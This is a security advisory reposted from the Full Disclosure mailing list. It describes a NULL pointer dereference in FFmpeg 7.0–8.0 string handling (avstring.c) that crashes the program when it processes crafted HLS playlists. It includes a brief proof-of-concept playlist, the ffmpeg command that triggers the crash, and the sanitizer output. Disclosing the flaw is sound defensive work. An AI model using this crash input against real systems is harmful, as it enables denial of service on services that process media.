FFmpeg 7.0+ NULL Pointer Dereference in FFmpeg String Handling (avstring.c)
FFmpeg 7.0至8.0版本中存在空指针解引用漏洞,由libavutil/avstring.c中的验证错误引起,在处理特定字符串时触发,导致拒绝服务攻击。 2025-9-8 22:28:31 Author: seclists.org(查看原文) 阅读量:1 收藏
fulldisclosure logo

Full Disclosure mailing list archives

From: Ron E <ronaldjedgerson () gmail com>
Date: Sun, 7 Sep 2025 01:47:46 -0400
Improper validation in libavutil/avstring.c allows a NULL pointer
dereference when processing certain strings in HLS contexts. UBSan reports
"applying zero offset to null pointer." Triggers denial of service (DoS)
when FFmpeg processes malicious playlists or malformed URLs. (FFmpeg 7.0 –
8.0)

*Impact:*

   -

   Consistently crashes the process (DoS).
   -

   Exploitation beyond denial of service is unlikely on modern OSes.


*Proof of Concept:*#EXTM3U
#EXTINF:10,
http://example.com/dummy.ts

./ffmpeg -i malicious.m3u8 -c copy out.mp4


*Output:*libavutil/avstring.c:455:15: runtime error: applying zero offset
to null pointer
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Current thread:

  • FFmpeg 7.0+ NULL Pointer Dereference in FFmpeg String Handling (avstring.c) Ron E (Sep 08)

文章来源: https://seclists.org/fulldisclosure/2025/Sep/28
如有侵权请联系:admin#unsafe.sh